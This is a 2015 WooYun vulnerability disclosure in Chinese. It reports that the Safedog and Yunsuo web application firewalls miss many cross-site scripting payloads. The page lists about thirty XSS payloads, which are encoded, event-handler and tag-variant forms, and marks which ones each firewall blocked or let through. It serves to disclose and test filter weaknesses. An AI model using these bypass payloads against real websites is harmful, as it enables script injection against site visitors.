当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-089591

漏洞标题:国内WAF的Fuzz测试之xss篇(安全狗、云锁为例)

相关厂商:cncert国家互联网应急中心

漏洞作者: HackBraid

提交时间:2015-01-04 15:30

修复时间:2015-04-04 15:32

公开时间:2015-04-04 15:32

漏洞类型:非授权访问/认证绕过

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-04: 细节已通知厂商并且等待厂商处理中
2015-01-09: 厂商已经确认,细节仅向厂商公开
2015-01-12: 细节向第三方安全合作伙伴开放
2015-03-05: 细节向核心白帽子及相关领域专家公开
2015-03-15: 细节向普通白帽子公开
2015-03-25: 细节向实习白帽子公开
2015-04-04: 细节向公众公开

简要描述:

用安全狗和云锁为例进行测试发现不少问题
来个闪电可好~

详细说明:

通过cheat sheet的可以批量对WAF进行测试,这里测试WAF的XSS防护能力,发现很严重的问题。
0x00 测试环境
wamp+74cms,参照 WooYun: 实战绕过云锁(1.3.145)进行注入测试绕过技巧 里配置,在url输入xss语句后,会被带入数据库端查询,所以会经过安全狗、云锁等WAF的检查。
0x01 XSS payload

<img src=x onerror=alert(1)>
<img/src=x onerror=alert(1)>
<img src=x onerror=alert(1)> 
<img src=x onerror=window.open('http://google.com');>
<img/src/onerror=alert(1)>
<img src="x:kcf" onerror="alert(1)">
<a href=javascript:alert(2)>M 
<a href=j&#x61;v&#97script&#x3A;&#97lert(13)>M
<a href=data:text/html;%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2829%29%3C%2F%73%63%72%69%70%74%3E>M 
<script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>
<script firefox>alert(1)</script>
<script>~'\u0061' ;  \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073.  \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script> // 
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script>
<script>prompt(-[])</script>
<script>alert(/3/)</script>
<script>alert(String.fromCharCode(49))</script>
<script>alert(/7/.source)</script>
<script>setTimeout('alert(1)',0)</script> 
<form><button formaction=javascript&colon;alert(1)>M
<button onfocus=alert(1) autofocus>
<button/onclick=alert(1) >M</button>
<p/onmouseover=javascript:alert(1); >M</p>
<var onmouseover="prompt(1)">KCF</var>
<div/onmouseover='alert(1)'>X 
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>
<select onfocus=javascript:alert(1) autofocus>
<textarea onfocus=javascript:alert(1) autofocus>
<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg> 
<math href="javascript:javascript:alert(1)">CLICKME</math> 
<video><source onerror="alert(1)"> 
<audio src=x onerror=alert(47)>


0x02 安全狗XSS测试结果:
1.<img src=x onerror=alert(1)> 被安全狗拦截

x.jpg


2.<img/src=x onerror=alert(1)> 绕过了

x1.jpg


3.<a>标签没有防护
<a href=javascript:alert(2)>

x2.jpg


4.<script>标签都被拦截
<script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>

x3.jpg


5.select、textarea、svg、button、math、video等标签都没防护
<select onfocus=javascript:alert(1) autofocus>

x4.jpg


<textarea onfocus=javascript:alert(1) autofocus>

x5.jpg


<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>

x6.jpg


<math href="javascript:javascript:alert(1)">CLICKME</math>

x7.jpg


<video><source onerror="alert(1)">

x8.jpg


<audio src=x onerror=alert(47)></code>

x9.jpg


<button onfocus=alert(1) autofocus>

x10.jpg


0x03 云锁测试结果
1.<img src=x onerror=alert(1)> 拦截

y.jpg


2.<img/src=x onerror=alert(1)> 绕过

x1.jpg


3.<a>标签没有防护
<a href=javascript:alert(2)>

x2.jpg


4.<script>标签被拦截
<script>alert(String.fromCharCode(49))</script>

y1.jpg


5.select、textarea、svg、button、math、video等标签同样都没防护
<select onfocus=javascript:alert(1) autofocus>

x4.jpg


<textarea onfocus=javascript:alert(1) autofocus>

x5.jpg


<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>

x6.jpg


<math href="javascript:javascript:alert(1)">CLICKME</math>

x7.jpg


<video><source onerror="alert(1)">

x8.jpg


<audio src=x onerror=alert(47)></code>

x9.jpg


<button onfocus=alert(1) autofocus>

x10.jpg


0x04 总结
安全狗、云锁在XSS防护方面只针对<script>标签做了防护,<img>可简单绕过,而像a、select、textarea、svg、button、math、video等标签是没有任何防护能力的。

漏洞证明:

见详细

修复方案:

增加防护规则

版权声明:转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-01-09 13:39

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。

最新状态:

暂无